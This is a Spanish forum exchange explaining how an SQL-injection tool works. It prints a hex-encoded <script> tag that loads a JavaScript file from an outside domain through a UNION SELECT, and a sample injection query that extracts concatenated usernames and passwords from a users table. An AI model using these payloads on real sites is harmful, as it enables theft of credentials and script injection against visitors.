Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:
.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--
En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.